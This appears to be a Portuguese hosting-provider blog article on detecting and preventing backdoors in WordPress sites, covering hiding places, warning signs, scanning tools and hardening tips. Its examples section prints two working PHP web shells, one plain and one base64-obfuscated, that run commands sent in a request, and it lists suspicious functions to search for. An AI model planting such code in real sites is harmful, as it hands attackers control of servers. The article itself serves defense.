Um backdoor é um acesso oculto criado por invasores para controlar seu site mesmo após a limpeza inicial. Ele contorna autenticação, injeta código malicioso e rouba dados. É uma das ameaças mais perigosas, pois pode permanecer escondido por meses. Nesse artigo você verá:
- Definição de backdoor
- Como um backdoor funciona
- Locais comuns onde se escondem
- Sinais de que seu site pode ter um backdoor
- Métodos manuais de detecção
- Ferramentas automáticas recomendadas
- Exemplos reais de código malicioso
- Boas práticas para prevenção
- Checklist rápido de segurança
1) Definição de backdoor
Backdoor significa “porta dos fundos”. É um código que permite a entrada de alguém no sistema sem seguir as regras normais de autenticação. Pode ser um arquivo PHP escondido, um plugin adulterado ou até mesmo código injetado em arquivos legítimos.
2) Como um backdoor funciona
Ele cria um atalho para executar comandos no servidor, modificar arquivos, acessar o banco de dados e instalar mais malware. Alguns permitem até que o invasor adicione novos administradores ou envie spam a partir do seu domínio.
3) Locais comuns onde se escondem
- Pastas de upload:
/wp-content/uploads/ - Arquivos principais do WordPress (ex.:
wp-config.php) - Temas e plugins abandonados ou nulled
- Arquivos com nomes parecidos com os originais (ex.:
wpp-config.php)
4) Sinais de que seu site pode ter um backdoor
- Alterações de arquivos sem explicação
- Novos usuários administradores que você não criou
- Envio de spam ou redirecionamentos estranhos
- Consumo anormal de recursos do servidor
5) Métodos manuais de detecção
- Comparar arquivos atuais com uma instalação limpa do WordPress
- Buscar por funções suspeitas (
eval,base64_decode,gzinflate,shell_exec) - Verificar arquivos recentes no servidor
- Checar cron jobs suspeitos
6) Ferramentas automáticas recomendadas
- Wordfence: Scanner em tempo real
- MalCare: Limpeza e firewall
- iThemes Security: Logs e monitoramento
- WP-CLI + grep: Busca avançada por código malicioso
7) Exemplos reais de código malicioso
// Exemplo simples de backdoor
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
// Exemplo com obfuscação
<?php
$payload = 'ZXZhbCgkX1BPU1RbJ2NtZCddKTs='; // base64
eval(base64_decode($payload));
?>
8) Boas práticas para prevenção
- Use apenas plugins e temas oficiais
- Atualize o WordPress, plugins e temas regularmente
- Desative a edição de arquivos pelo painel (
DISALLOW_FILE_EDIT) - Bloqueie execução de PHP no
/uploads - Mantenha backups regulares fora do servidor
- Use firewall e limite tentativas de login
9) Checklist rápido de segurança
- Backup feito
- WordPress e plugins atualizados
- Permissões corretas de arquivos e pastas
- Scanner de malware ativo
- Usuários revisados
Perguntas Frequentes (FAQ)
Backdoor é o mesmo que vírus?
Não. Backdoor é um tipo de acesso clandestino. Ele pode ser usado para instalar vírus, mas não é exatamente um vírus. Posso remover um backdoor manualmente?
Sim, mas exige cuidado. Remova o código, revise todos os arquivos e altere credenciais. Faça backup antes. Plugins de segurança detectam todos os backdoors?
Não. Alguns são muito bem escondidos. Combine ferramentas automáticas com inspeção manual. Como evitar que um backdoor volte?
Corrija a vulnerabilidade usada para inseri-lo e mantenha o site atualizado e protegido. Backdoor pode estar no banco de dados?
Sim. Pode ser injetado em campos ou opções. Sempre verifique conteúdo suspeito no banco.
Tags
WordPress, Segurança, Backdoor, Malware, Firewall, Hardening, Server Express
